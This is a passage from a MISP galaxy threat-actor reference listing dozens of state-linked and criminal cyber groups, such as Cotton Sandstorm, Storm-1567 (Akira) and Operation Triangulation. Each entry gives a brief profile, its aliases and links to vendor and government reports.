Table 12329. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook

Cotton Sandstorm

Cotton Sandstorm is an Iranian threat actor involved in hack-and-leak operations. They have targeted various organizations, including the French satirical magazine Charlie Hebdo, where they obtained and leaked personal information of over 200,000 customers. The group has been linked to the Iranian government and has been sanctioned by the US Treasury

The tag is: misp-galaxy:threat-actor="Cotton Sandstorm"

Cotton Sandstorm is also known as:

  • Emennet Pasargad

  • Holy Souls

  • MARNANBRIDGE

  • NEPTUNIUM

Table 12330. Table References

Links

https://blog.sekoia.io/iran-cyber-threat-overview/

https://blogs.microsoft.com/on-the-issues/2023/02/03/dtac-charlie-hebdo-hack-iran-neptunium/

https://www.ic3.gov/Media/News/2022/220126.pdf

https://www.microsoft.com/en-us/security/business/security-insider/threat-briefs/iran-response-for-charlie-hebdo-attacks/

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

Blackwood

Blackwood is a China-aligned APT group that has been active since at least 2018. They primarily engage in cyberespionage operations targeting individuals and companies in China, Japan, and the United Kingdom. Blackwood utilizes sophisticated techniques such as adversary-in-the-middle attacks to deliver their custom implant, NSPX30, through updates of legitimate software. They also have the capability to hide the location of their command and control servers by intercepting traffic generated by the implant.

The tag is: misp-galaxy:threat-actor="Blackwood"

Table 12331. Table References

Links

https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/

https://blog.sonicwall.com/en-us/2024/01/blackwood-apt-group-has-a-new-dll-loader/

Denim Tsunami

Denim Tsunami is a threat actor group that has been involved in targeted attacks against European and Central American customers. They have been observed using multiple Windows and Adobe 0-day exploits, including one for CVE-2022-22047, which is a privilege escalation vulnerability. Denim Tsunami developed a custom malware called Subzero, which has capabilities such as keylogging, capturing screenshots, data exfiltration, and running remote shells. They have also been associated with the Austrian spyware distributor DSIRF.

The tag is: misp-galaxy:threat-actor="Denim Tsunami"

Denim Tsunami is also known as:

  • KNOTWEED

  • DSIRF

Table 12332. Table References

Links

https://www.thezdi.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation

https://socradar.io/threats-of-commercialized-malware-knotweed/

https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/

Blue Tsunami

Blue Tsunami, also known as Black Cube, is a cyber mercenary group associated with the private intelligence firm Black Cube. They target individuals in various industries, including human rights, finance, and consulting. Blue Tsunami engages in social engineering and uses techniques such as honeypot profiles, fake jobs, and fake companies to gather human intelligence for their clients. LinkedIn and Microsoft recently took down numerous fake accounts and company pages linked to Blue Tsunami.

The tag is: misp-galaxy:threat-actor="Blue Tsunami"

Blue Tsunami is also known as:

  • Black Cube

Table 12333. Table References

Links

https://precisionpconline.com/a-unified-front-against-cyber-mercenaries/

https://www.microsoft.com/en-us/security/blog/2023/11/09/microsoft-shares-threat-intelligence-at-cyberwarcon-2023/

Cuboid Sandstorm

Cuboid Sandstorm is an Iranian threat actor that targeted an Israel-based IT company in July 2021. They gained access to the company’s network and used it to compromise downstream customers in the defense, energy, and legal sectors in Israel. The group also utilized custom implants, including a remote access Trojan disguised as RuntimeBroker.exe or svchost.exe, to establish persistence on victim hosts.

The tag is: misp-galaxy:threat-actor="Cuboid Sandstorm"

Cuboid Sandstorm is also known as:

  • DEV-0228

Table 12334. Table References

Links

https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/

Pearl Sleet

Pearl Sleet is a nation state activity group based in North Korea that has been active since at least 2012. They primarily target defectors from North Korea, media organizations in carrying out their cyber espionage activities.

The tag is: misp-galaxy:threat-actor="Pearl Sleet"

Pearl Sleet is also known as:

  • DEV-0215

  • LAWRENCIUM

Table 12335. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/monthly-news-december-2023/ba-p/3998431

Carmine Tsunami

Carmine Tsunami is a threat actor linked to an Israel-based private sector offensive actor called QuaDream. QuaDream sells a platform called REIGN to governments for law enforcement purposes, which includes exploits, malware, and infrastructure for data exfiltration from mobile devices. Carmine Tsunami is associated with the iOS malware called KingsPawn and has targeted civil society victims, including journalists, political opposition figures, and NGO workers, in various regions. They utilize domain registrars and inexpensive cloud hosting providers, often using single domains per IP address and deploying free Let’s Encrypt SSL certificates.

The tag is: misp-galaxy:threat-actor="Carmine Tsunami"

Carmine Tsunami is also known as:

  • DEV-0196

  • QuaDream

Table 12336. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/04/11/dev-0196-quadreams-kingspawn-malware-used-to-target-civil-society-in-europe-north-america-the-middle-east-and-southeast-asia/

https://citizenlab.ca/2023/04/spyware-vendor-quadream-exploits-victims-customers/

Mustard Tempest

Mustard Tempest is a threat actor that primarily uses malvertising as their main technique to gain access to and profile networks. They deploy FakeUpdates, disguised as browser updates or software packages, to lure targets into downloading a ZIP file containing a JavaScript file. Once executed, the JavaScript framework acts as a loader for other malware campaigns, often Cobalt Strike payloads. Mustard Tempest has been associated with the cybercrime syndicate Mustard Tempest, also known as EvilCorp, and has been involved in ransomware attacks using payloads such as WastedLocker, PhoenixLocker, and Macaw.

The tag is: misp-galaxy:threat-actor="Mustard Tempest"

Mustard Tempest is also known as:

  • DEV-0206

  • Purple Vallhund

Table 12337. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

UNC4990

UNC4990 is a financially motivated threat actor that has been active since at least 2020. They primarily target users in Italy and rely on USB devices for initial infection. The group has evolved their tactics over time, using encoded text files on popular websites like GitHub and Vimeo to host payloads. They have been observed using sophisticated backdoors like QUIETBOARD and EMPTYSPACE, and have targeted organizations in various industries, particularly in Italy.

The tag is: misp-galaxy:threat-actor="UNC4990"

Table 12338. Table References

Links

https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware

Caramel Tsunami

Caramel Tsunami is a threat actor that specializes in spyware attacks. They have recently resurfaced with an updated toolset and zero-day exploits, targeting specific victims through watering hole attacks. Candiru has been observed exploiting vulnerabilities in popular browsers like Google Chrome and using third-party signed drivers to gain access to the Windows kernel. They have also been linked to other spyware vendors and have been associated with extensive abuses of their surveillance tools.

The tag is: misp-galaxy:threat-actor="Caramel Tsunami"

Caramel Tsunami is also known as:

  • SOURGUM

  • Candiru

Table 12339. Table References

Links

https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/

https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/

https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/

https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/

https://www.microsoft.com/en-us/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/

Storm-0867

Storm-0867 is a threat actor that has been active since 2012 and has targeted various industries and regions. They employ sophisticated phishing campaigns, utilizing social engineering techniques and a phishing as a service platform called Caffeine. Their attacks involve intercepting and manipulating communication between users and legitimate services, allowing them to steal passwords, hijack sign-in sessions, bypass multifactor authentication, and modify authentication methods.

The tag is: misp-galaxy:threat-actor="Storm-0867"

Storm-0867 is also known as:

  • DEV-0867

Table 12340. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/defender-experts-chronicles-a-deep-dive-into-storm-0867/ba-p/3911769

Velvet Tempest

Velvet Tempest is a threat actor associated with the BlackCat ransomware group. They have been observed deploying multiple ransomware payloads, including BlackCat, and have targeted various industries such as energy, fashion, tobacco, IT, and manufacturing. Velvet Tempest relies on access brokers to gain network access and utilizes tools like Cobalt Strike Beacons and PsExec for lateral movement and payload staging. They exfiltrate stolen data using a tool called StealBit and frequently disable unprotected antivirus products.

The tag is: misp-galaxy:threat-actor="Velvet Tempest"

Velvet Tempest is also known as:

  • DEV-0504

Table 12341. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

http://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

Sunglow Blizzard

DEV-0665 is a threat actor associated with the HermeticWiper attacks. Their objective is to disrupt, degrade, and destroy specific resources within a targeted country.

The tag is: misp-galaxy:threat-actor="Sunglow Blizzard"

Sunglow Blizzard is also known as:

  • DEV-0665

Table 12342. Table References

Links

https://twitter.com/ESETresearch/status/1503436420886712321

https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html

Vanilla Tempest

Vice Society is a ransomware group that has been active since at least June 2021. They primarily target the education and healthcare sectors, but have also been observed targeting the manufacturing industry. The group has used multiple ransomware families and has been known to utilize PowerShell scripts for their attacks. There are similarities between Vice Society and the Rhysida ransomware group, suggesting a potential connection or rebranding.

The tag is: misp-galaxy:threat-actor="Vanilla Tempest"

Vanilla Tempest is also known as:

  • DEV-0832

  • Vice Society

Table 12343. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation

https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

Lilac Typhoon

Lilac Typhoon is a threat actor attributed to China. They have been identified as exploiting the Atlassian Confluence RCE vulnerability CVE-2022-26134, which allows for remote code execution. This vulnerability has been used in cryptojacking campaigns and is included in commercial exploit frameworks. Lilac Typhoon has also been involved in deploying various payloads such as Cobalt Strike, web shells, botnets, coin miners, and ransomware.

The tag is: misp-galaxy:threat-actor="Lilac Typhoon"

Lilac Typhoon is also known as:

  • DEV-0234

Table 12344. Table References

Links

https://securityboulevard.com/2022/10/analysis-of-cisa-releases-advisory-on-top-cves-exploited-chinese-state-sponsored-groups/

https://riskybiznews.substack.com/p/risky-biz-news-google-shuts-down

https://twitter.com/MsftSecIntel/status/1535417776290111489

Ruby Sleet

Ruby Sleet is a threat actor linked to North Korea’s Ministry of State Security. Cerium has been involved in spear-phishing campaigns, compromising devices, and conducting cyberattacks alongside other North Korean threat actors. They have also targeted companies involved in COVID-19 research and vaccine development.

The tag is: misp-galaxy:threat-actor="Ruby Sleet"

Ruby Sleet is also known as:

  • CERIUM

Table 12345. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/11/13/health-care-cyberattacks-covid-19-paris-peace-forum/

Raspberry Typhoon

Microsoft has tracked Raspberry Typhoon (RADIUM) as the primary threat group targeting nations that ring the South China Sea. Raspberry Typhoon consistently targets government ministries, military entities, and corporate entities connected to critical infrastructure, particularly telecoms. Since January 2023, Raspberry Typhoon has been particularly persistent. When targeting government ministries or infrastructure, Raspberry Typhoon typically conducts intelligence collection and malware execution. In many countries, targets vary from defense and intelligence-related ministries to economic and trade-related ministries

The tag is: misp-galaxy:threat-actor="Raspberry Typhoon"

Raspberry Typhoon is also known as:

  • RADIUM

Table 12346. Table References

Links

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW

Phlox Tempest

Phlox Tempest is a threat actor responsible for a large-scale click fraud campaign targeting users through YouTube comments and malicious ads. They use ChromeLoader to infect victims' computers with malware, often delivered as ISO image files that victims are tricked into downloading. The attackers aim to profit from clicks generated by malicious browser extensions or node-WebKit installed on the victim’s device. Microsoft and other cybersecurity organizations have issued warnings about this ongoing and prevalent campaign.

The tag is: misp-galaxy:threat-actor="Phlox Tempest"

Phlox Tempest is also known as:

  • DEV-0796

Table 12347. Table References

Links

https://twitter.com/MsftSecIntel/status/1570911625841983489

Storm-1295

Storm-1295 is a threat actor group that operates the Greatness phishing-as-a-service platform. They utilize synchronous relay servers to present targets with a replica of a sign-in page, resembling traditional phishing attacks. Their adversary-in-the-middle capability allows Storm-1295 to offer their services to other attackers. Active since mid-2022, Storm-1295 is tracked by Microsoft and is known for their involvement in the Greatness PhaaS platform.

The tag is: misp-galaxy:threat-actor="Storm-1295"

Storm-1295 is also known as:

  • DEV-1295

Table 12348. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/monthly-news-july-2023/ba-p/3860740

https://twitter.com/MsftSecIntel/status/1696273952870367320

Storm-1167

Storm-1167 is a threat actor tracked by Microsoft, known for their use of an AiTM phishing kit. They were responsible for launching an attack that led to Business Email Compromise activity.

The tag is: misp-galaxy:threat-actor="Storm-1167"

Storm-1167 is also known as:

  • DEV-1167

Table 12349. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/06/08/detecting-and-mitigating-a-multi-stage-aitm-phishing-and-bec-campaign/

Opal Sleet

Konni is a threat actor associated with APT37, a North Korean cyber crime group. They have been active since 2012 and are known for their cyber-espionage activities. Konni has targeted various sectors, including education, government, business organizations, and the cryptocurrency industry. They have exploited vulnerabilities such as CVE-2023-38831 and have used malware like KonniRAT to gain control of victim hosts and steal important information.

The tag is: misp-galaxy:threat-actor="Opal Sleet"

Opal Sleet is also known as:

  • OSMIUM

  • Konni

Table 12350. Table References

Links

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

https://paper.seebug.org/3031/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-konni-apt-group-active-iocs-11

https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/

Storm-1044

Storm-1044 has been identified as part of a cyber campaign in collaboration with Twisted Spider. They employ a strategic approach, targeting specific endpoints using an initial access trojan called DanaBot. Once they gain access, Storm-1044 initiates lateral movement through Remote Desktop Protocol sign-in attempts, passing control to Twisted Spider. Twisted Spider then compromises the endpoints by introducing the CACTUS ransomware. Microsoft has detected ongoing malvertising attacks involving Storm-1044, leading to the deployment of CACTUS ransomware.

The tag is: misp-galaxy:threat-actor="Storm-1044"

Storm-1044 is also known as:

  • DEV-1044

Table 12351. Table References

Links

https://twitter.com/MsftSecIntel/status/1730383711437283757

Pink Sandstorm

Agonizing Serpens is an Iranian-linked APT group that has been active since 2020. They are known for their destructive wiper and fake-ransomware attacks, primarily targeting Israeli organizations in the education and technology sectors. The group has strong connections to Iran’s Ministry of Intelligence and Security and has been observed using various tools and techniques to bypass security measures. They aim to steal sensitive information, including PII and intellectual property, and inflict damage by wiping endpoints.

The tag is: misp-galaxy:threat-actor="Pink Sandstorm"

Pink Sandstorm is also known as:

  • AMERICIUM

  • BlackShadow

  • DEV-0022

  • Agrius

  • Agonizing Serpens

Table 12352. Table References

Links

https://www.oodaloop.com/archive/2024/01/02/critical-infrastructure-remains-the-brass-ring-for-cyber-attackers-in-2024/

https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/

https://socprime.com/blog/agonizing-serpens-attack-detection-iran-backed-hackers-target-israeli-tech-firms-and-educational-institutions/

https://therecord.media/iran-linked-hackers-target-israel-education-tech-sectors

https://www.enigmasoftware.com/moneybirdransomware-removal/

https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/

Storm-1084

Storm-1084 is a threat actor that has been observed collaborating with the MuddyWater group. They have used the DarkBit persona to mask their involvement in targeted attacks. Storm-1084 has been linked to destructive actions, including the encryption of on-premise devices and deletion of cloud resources. They have been observed using tools such as Rport, Ligolo, and a customized PowerShell backdoor. The extent of their autonomy or collaboration with other Iranian threat actors is currently unclear.

The tag is: misp-galaxy:threat-actor="Storm-1084"

Storm-1084 is also known as:

  • DEV-1084

Table 12353. Table References

Links

https://circleid.com/posts/20230824-signs-of-muddywater-developments-found-in-the-dns

https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/

Storm-1099

Storm-1099 is a sophisticated Russia-affiliated influence actor that has been conducting pro-Russia influence operations targeting international supporters of Ukraine since Spring 2022. They are known for their website forgery operation called "Doppelganger" and have been actively spreading false information. They have been involved in pushing the claim that Hamas acquired Ukrainian weapons for an attack on Israel. Storm-1099 has also been implicated in amplifying images of graffiti in Paris, suggesting possible Russian involvement and aligning with Russia’s Active Measures playbook.

The tag is: misp-galaxy:threat-actor="Storm-1099"

Table 12354. Table References

Links

https://blogs.microsoft.com/on-the-issues/2023/12/07/russia-ukraine-digital-threat-celebrity-cameo-mtac/

Storm-1286

Storm-1286 is a threat actor that engages in large-scale spamming activities, primarily targeting user accounts without multifactor authentication enabled. They employ password spraying attacks to compromise these accounts and utilize legacy authentication protocols like IMAP and SMTP. In the past, they have attempted to compromise admin accounts and create new LOB applications with high administrative permissions to spread spam. Despite previous actions taken by Microsoft Threat Intelligence, Storm-1286 continues to explore new methods to establish a high-scale spamming platform within victim organizations using non-privileged users.

The tag is: misp-galaxy:threat-actor="Storm-1286"

Table 12355. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/

Storm-1101

DEV-1101 is a threat actor tracked by Microsoft who is responsible for developing and advertising phishing kits, specifically AiTM phishing kits. These kits are capable of bypassing multifactor authentication and are available for purchase or rent by other cybercriminals. DEV-1101 offers an open-source kit with various enhancements, such as mobile device management and CAPTCHA evasion. Their tool has been used in high-volume phishing campaigns by multiple actors, including DEV-0928, and is sold for $300 with VIP licenses available for $1,000.

The tag is: misp-galaxy:threat-actor="Storm-1101"

Storm-1101 is also known as:

  • DEV-1101

Table 12356. Table References

Links

http://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/

Storm-0381

Storm-0381 is a threat actor identified by Microsoft as a Russian cybercrime group. They are known for their use of malvertising to deploy Magniber, a type of ransomware.

The tag is: misp-galaxy:threat-actor="Storm-0381"

Storm-0381 is also known as:

  • DEV-0381

Table 12357. Table References

Links

https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023

Storm-0530

H0lyGh0st is a North Korean threat actor that has been active since June 2021. They are responsible for developing and deploying the H0lyGh0st ransomware, which targets small-to-medium businesses in various sectors. The group employs "double extortion" tactics, encrypting data and threatening to publish it if the ransom is not paid. There are connections between H0lyGh0st and the PLUTONIUM APT group, indicating a possible affiliation.

The tag is: misp-galaxy:threat-actor="Storm-0530"

Storm-0530 is also known as:

  • DEV-0530

  • H0lyGh0st

Table 12358. Table References

Links

https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a

https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware

https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/

https://www.picussecurity.com/resource/h0lygh0st-north-korean-threat-group-strikes-back-with-new-ransomware

Storm-0539

Storm-0539 is a financially motivated threat actor that has been active since at least 2021. They primarily target retail organizations for gift card fraud and theft. Their tactics include phishing via emails or SMS to distribute malicious links that redirect users to phishing pages designed to steal credentials and session tokens. Once access is gained, Storm-0539 registers a device for secondary authentication prompts, bypassing multi-factor authentication and gaining persistence in the environment. They also collect emails, contact lists, and network configurations for further attacks against the same organizations.

The tag is: misp-galaxy:threat-actor="Storm-0539"

Table 12359. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-update-microsoft-warns-of-emerging-threat-by-storm-0539-behind-gift-card-frauds/

https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/monthly-news-november-2023/ba-p/3970796

Storm-1152

Storm-1152, a cybercriminal group, was recently taken down by Microsoft for illegally reselling Outlook accounts. They operated by creating approximately 750 million fraudulent Microsoft accounts and earned millions of dollars in illicit revenue. Storm-1152 also offered CAPTCHA-solving services and was connected to ransomware and extortion groups. Microsoft obtained a court order to seize their infrastructure and domains, disrupting their operations.

The tag is: misp-galaxy:threat-actor="Storm-1152"

Table 12360. Table References

Links

https://securityboulevard.com/2023/12/microsoft-storm-1152-crackdown-stopping-threat-actors/

https://blogs.microsoft.com/on-the-issues/2023/12/13/cybercrime-cybersecurity-storm-1152-fraudulent-accounts/

https://www.rewterz.com/rewterz-news/rewterz-threat-update-microsoft-warns-of-emerging-threat-by-storm-0539-behind-gift-card-frauds/

Storm-1567

Storm-1567 is the threat actor behind the Ransomware-as-a-Service Akira. They attacked Swedish organizations in March 2023. This ransomware utilizes the ChaCha encryption algorithm, PowerShell, and Windows Management Instrumentation (WMI). Microsoft’s Defender for Endpoint successfully blocked a large-scale hacking campaign carried out by Storm-1567, highlighting the effectiveness of their security solution.

The tag is: misp-galaxy:threat-actor="Storm-1567"

Storm-1567 is also known as:

  • Akira

Table 12361. Table References

Links

https://news.sophos.com/en-us/2023/12/20/cryptoguard-an-asymmetric-approach-to-the-ransomware-battle/

https://securelist.com/crimeware-report-fakesg-akira-amos/111483/

https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html

https://blog.sekoia.io/sekoia-io-mid-2023-ransomware-threat-landscape

https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/

Storm-0829

Nwgen is a group that focuses on data exfiltration and ransomware activities. They have been found to share techniques with other threat groups such as Karakurt, Lapsus$, and Yanluowang. Nwgen has been observed carrying out attacks and deploying ransomware, encrypting files and demanding a ransom of $150,000 in Monero cryptocurrency for the decryption software.

The tag is: misp-galaxy:threat-actor="Storm-0829"

Storm-0829 is also known as:

  • DEV-0829

  • Nwgen Team

Table 12362. Table References

Links

https://www.enigmasoftware.com/nwgenransomware-removal/

https://www.databreaches.net/east-tennessee-childrens-hospital-updates-information-on-ransomware-incident/

https://readme.security/cybercrime-is-more-of-a-threat-than-nation-state-hackers-6f6cccf47721

https://twitter.com/cglyer/status/1546297609215696897

Storm-1674

Storm-1674 is an access broker known for using tools based on the publicly available TeamsPhisher tool to distribute DarkGate malware. Storm-1674 campaigns have typically relied on phishing lures sent over Teams with malicious attachments, such as ZIP files containing a LNK file that ultimately drops DarkGate and Pikabot. In September 2023, Microsoft observed handoffs from Storm-1674 to ransomware operators that have led to Black Basta ransomware deployment.

The tag is: misp-galaxy:threat-actor="Storm-1674"

Table 12363. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs/

Storm-0835

Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform "indeed.com," redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.

The tag is: misp-galaxy:threat-actor="Storm-0835"

Table 12364. Table References

Links

https://www.linkedin.com/pulse/cyber-criminals-using-evilproxy-phishing-kit-target-senior-soral/

Storm-1575

Storm-1575 is a threat actor identified by Microsoft as being involved in phishing campaigns using the Dadsec platform. They utilize hundreds of Domain Generated Algorithm domains to host credential harvesting pages and target global organizations to steal Microsoft 365 credentials.

The tag is: misp-galaxy:threat-actor="Storm-1575"

Table 12365. Table References

Links

https://www.bridewell.com/insights/blogs/detail/analysing-widespread-microsoft365-credential-harvesting-campaign

https://twitter.com/MsftSecIntel/status/1712936244987019704?lang=en

TA2552

Since January 2020, Proofpoint researchers have tracked an actor abusing Microsoft Office 365 (O365) third-party application (3PA) access, with suspected activity dating back to August 2019. The actor, known as TA2552, uses well-crafted Spanish language lures that leverage a narrow range of themes and brands. The lures entice users to click a link in the message, taking them to the legitimate Microsoft third-party apps consent page. There they are prompted to grant a third-party application read-only user permissions to their O365 account via OAuth2 or other token-based authorization methods. TA2552 seeks access to specific account resources like the user’s contacts and mail. Requesting read-only permissions for such account resources could be used to conduct account reconnaissance, silently steal data, or to intercept password reset messages from other accounts such as those at financial institutions. While organizations with global presence have received messages from this group, they appear to choose recipients who are likely Spanish speakers.

The tag is: misp-galaxy:threat-actor="TA2552"

Table 12366. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta2552-uses-oauth-access-token-phishing-exploit-read-only-risks

TA2722

TA2722 is a highly active threat actor that targets various industries including Shipping/Logistics, Manufacturing, Business Services, Pharmaceutical, and Energy. They primarily focus on organizations in North America, Europe, and Southeast Asia. This threat actor impersonates Philippine government entities and uses themes related to the government to gain remote access to target computers. Their objectives include information gathering, installing follow-on malware, and engaging in business email compromise activities.

The tag is: misp-galaxy:threat-actor="TA2722"

TA2722 is also known as:

  • Balikbayan Foxes

Table 12367. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread

TA2719

In late March 2020, Proofpoint researchers began tracking a new actor with a penchant for using NanoCore and later AsyncRAT, popular commodity remote access trojans (RATs). Dubbed TA2719 by Proofpoint, the actor uses localized lures with colorful images that impersonate local banks, law enforcement, and shipping services. Proofpoint has observed this actor send low volume campaigns to recipients in Austria, Chile, Greece, Hungary, Italy, North Macedonia, Netherlands, Spain, Sweden, Taiwan, United States, and Uruguay.

The tag is: misp-galaxy:threat-actor="TA2719"

Table 12368. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages

Karkadann

Karkadann is a threat actor that has been active since at least October 2020, targeting government bodies and news outlets in the Middle East. They have been involved in watering hole attacks, compromising high-profile websites to inject malicious JavaScript code. The group has been linked to another commercial spyware company called Candiru, suggesting they may utilize multiple spyware technologies. There are similarities in the infrastructure and tactics used by Karkadann in their campaigns.

The tag is: misp-galaxy:threat-actor="Karkadann"

Karkadann is also known as:

  • Piwiks

Table 12369. Table References

Links

https://securelist.com/apt-trends-report-q2-2022/106995/

https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/

Tomiris

Tomiris is a threat actor that has been active since at least 2019. They primarily target government and diplomatic entities in the Commonwealth of Independent States region, with occasional victims in other regions being foreign representations of CIS countries. Tomiris uses a wide variety of malware implants, including downloaders, backdoors, and file stealers, developed in different programming languages. They employ various attack vectors such as spear-phishing, DNS hijacking, and exploitation of vulnerabilities. There are potential ties between Tomiris and Turla, but they are considered separate threat actors with distinct targeting and tradecraft by Kaspersky.

The tag is: misp-galaxy:threat-actor="Tomiris"

Table 12370. Table References

Links

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

ShaggyPanther

ShaggyPanther is a threat actor that primarily targets government entities in Taiwan and Malaysia. They have been active since 2008 and utilize hidden encrypted payloads in registry keys. Their activities have been detected in various locations, including Indonesia and Syria.

The tag is: misp-galaxy:threat-actor="ShaggyPanther"

Table 12371. Table References

Links

https://securelist.com/ksb-2019-review-of-the-year/95394/

https://securelist.com/apt-trends-report-q3-2019/94530/

https://securelist.com/apt-review-of-the-year/89117/

Fishing Elephant

Fishing Elephant is a threat actor that primarily targets victims in Bangladesh and Pakistan. They rely on consistent TTPs, including payload and communication patterns, while occasionally incorporating new techniques such as geo-fencing and hiding executables within certificate files. Their tool of choice is AresRAT, which they deliver through platforms like Heroku and Dropbox. Recently, they have shifted their focus to government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine, and China.

The tag is: misp-galaxy:threat-actor="Fishing Elephant"

Table 12372. Table References

Links

https://securelist.com/apt-trends-report-q1-2020/96826/

https://securelist.com/apt-trends-report-q1-2022/106351/

RevengeHotels

RevengeHotels is a targeted cybercrime campaign that has been active since 2015, primarily targeting hotels, hostels, and tourism companies. The threat actor uses remote access Trojan malware to infiltrate hotel front desks and steal credit card data from guests and travelers. The campaign has impacted hotels in multiple countries, including Brazil, Argentina, Chile, and Mexico. The threat actor employs social engineering techniques and sells credentials from infected systems to other cybercriminals for remote access.

The tag is: misp-galaxy:threat-actor="RevengeHotels"

Table 12373. Table References

Links

https://securelist.com/revengehotels/95229/

GhostEmperor

GhostEmperor is a Chinese-speaking threat actor that targets government entities and telecom companies in Southeast Asia. They employ a Windows kernel-mode rootkit called Demodex to gain remote control over their targeted servers. The actor demonstrates a high level of sophistication and uses various anti-forensic and anti-analysis techniques to evade detection. They have been active for a significant period of time and continue to pose a threat to their targets.

The tag is: misp-galaxy:threat-actor="GhostEmperor"

Table 12374. Table References

Links

https://www.mandiant.com/resources/blog/unc4841-post-barracuda-zero-day-remediation

https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/

Operation Triangulation

Operation Triangulation is an ongoing APT campaign targeting iOS devices with zero-click iMessage exploits. The threat actor behind the campaign has been active since at least 2019 and continues to operate. The attack chain involves the delivery of a malicious iMessage attachment that launches a series of exploits, ultimately leading to the deployment of the TriangleDB implant. Kaspersky researchers have discovered and reported multiple vulnerabilities used in the campaign, with patches released by Apple.

The tag is: misp-galaxy:threat-actor="Operation Triangulation"

Table 12375. Table References

Links

https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/

https://securelist.com/operation-triangulation-catching-wild-triangle/110916/

https://securelist.com/triangulation-validators-modules/110847/

https://securelist.com/operation-triangulation/109842/

Operation Ghoul

